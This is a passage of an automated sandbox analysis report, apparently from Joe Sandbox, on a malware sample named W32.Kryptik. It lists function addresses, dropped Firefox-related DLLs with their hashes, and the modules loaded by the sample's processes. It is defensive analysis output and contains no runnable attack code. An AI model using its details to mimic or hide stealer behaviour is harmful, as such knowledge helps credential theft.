Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 8_2_049589D0	8_2_049589D0
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 8_2_049559F7	8_2_049559F7
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 8_2_0495A916	8_2_0495A916
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 8_2_0496A930	8_2_0496A930
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 8_2_04957A80	8_2_04957A80
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 8_2_0495CA10	8_2_0495CA10
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 8_2_0495DBE0	8_2_0495DBE0
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 8_2_04960B00	8_2_04960B00
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 8_2_04952B60	8_2_04952B60
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_0040D240	9_2_0040D240
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_00419F90	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_0040C070	9_2_0040C070
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_0042E003	9_2_0042E003
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_00408030	9_2_00408030
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_00410160	9_2_00410160
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_004C8113	9_2_004C8113
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_004021C0	9_2_004021C0
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_0044237E	9_2_0044237E
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_004084C0	9_2_004084C0
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_004344FF	9_2_004344FF
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_0043E5A3	9_2_0043E5A3
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_0040A660	9_2_0040A660
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_0041E690	9_2_0041E690
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_00406740	9_2_00406740
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_00402750	9_2_00402750
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_0040A710	9_2_0040A710
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_00408780	9_2_00408780
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_0042C804	9_2_0042C804
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_00406880	9_2_00406880
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_004349F3	9_2_004349F3
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_004069F3	9_2_004069F3
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_00402B80	9_2_00402B80
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_00406B80	9_2_00406B80
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_0044ACFF	9_2_0044ACFF
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_0042CE51	9_2_0042CE51
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_00434E0B	9_2_00434E0B
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_00406EE0	9_2_00406EE0
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_00420F30	9_2_00420F30
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_00405057	9_2_00405057
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_0042F010	9_2_0042F010
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_004070E0	9_2_004070E0
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_004391F6	9_2_004391F6
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_00435240	9_2_00435240
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_00405447	9_2_00405447
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_00405457	9_2_00405457
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_00449506	9_2_00449506
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_0044B5B1	9_2_0044B5B1
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_00435675	9_2_00435675
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_00409686	9_2_00409686
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_0040F730	9_2_0040F730
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_0044D7A1	9_2_0044D7A1
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_00481920	9_2_00481920
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_0044D9DC	9_2_0044D9DC
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_00449A71	9_2_00449A71
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_00443B40	9_2_00443B40
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_00409CF9	9_2_00409CF9
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_0040DD40	9_2_0040DD40
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_00427D6C	9_2_00427D6C
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_0040BDC0	9_2_0040BDC0
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_00409DFA	9_2_00409DFA
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_00409F76	9_2_00409F76
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 9_2_00449FE3	9_2_00449FE3
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: 13_2_048E3520	13_2_048E3520
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: 13_2_048E7520	13_2_048E7520
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: 13_2_0492B69F	13_2_0492B69F
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: 13_2_048EA699	13_2_048EA699
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: 13_2_048EE6E0	13_2_048EE6E0
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: 13_2_048EA79A	13_2_048EA79A
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: 13_2_0490D7F1	13_2_0490D7F1
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: 13_2_048EC760	13_2_048EC760
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: 13_2_048EB0B0	13_2_048EB0B0
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: 13_2_048F00D0	13_2_048F00D0
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: 13_2_048E70E0	13_2_048E70E0
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: 13_2_048E30F0	13_2_048E30F0
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: 13_2_048EB000	13_2_048EB000
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: 13_2_048EA026	13_2_048EA026
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: 13_2_048FF030	13_2_048FF030
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: 13_2_0490D1A4	13_2_0490D1A4
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: 13_2_048E9120	13_2_048E9120
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: 13_2_0492E141	13_2_0492E141
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: 13_2_049622C0	13_2_049622C0
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: 13_2_048E7220	13_2_048E7220
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: 13_2_048E7393	13_2_048E7393
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: 13_2_0492E37C	13_2_0492E37C
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: 13_2_048E5DE7	13_2_048E5DE7
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: 13_2_048E5DF7	13_2_048E5DF7
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: 13_2_04922D1E	13_2_04922D1E
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: 13_2_04914E9F	13_2_04914E9F
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: 13_2_048E8E60	13_2_048E8E60
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: 13_2_048E7880	13_2_048E7880
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: 13_2_049018D0	13_2_049018D0
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: 13_2_0490F9B0	13_2_0490F9B0
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: 13_2_0490E9A3	13_2_0490E9A3
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: 13_2_048E89D0	13_2_048E89D0
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: 13_2_048E59F7	13_2_048E59F7
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: 13_2_048EA916	13_2_048EA916
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: 13_2_048FA930	13_2_048FA930
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: 13_2_048E7A80	13_2_048E7A80
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: 13_2_048ECA10	13_2_048ECA10
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: 13_2_048EDBE0	13_2_048EDBE0
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: 13_2_048F0B00	13_2_048F0B00
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: 13_2_048E2B60	13_2_048E2B60

Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: String function: 00428C81 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: String function: 04978EC0 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: String function: 04980160 appears 50 times
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: String function: 004547A0 appears 75 times
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: String function: 0042F7C0 appears 71 times
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: String function: 0044F23E appears 53 times
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: String function: 00428520 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: String function: 00454E50 appears 31 times
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: String function: 04910160 appears 50 times
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: String function: 04908EC0 appears 57 times

Source: C:\Windows\explorer.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3968 -s 11016

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcbhtea	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcbhtea	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcbhtea	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: drprov.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: ntlanman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: davclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: davhlpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: browcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: schannel.dll
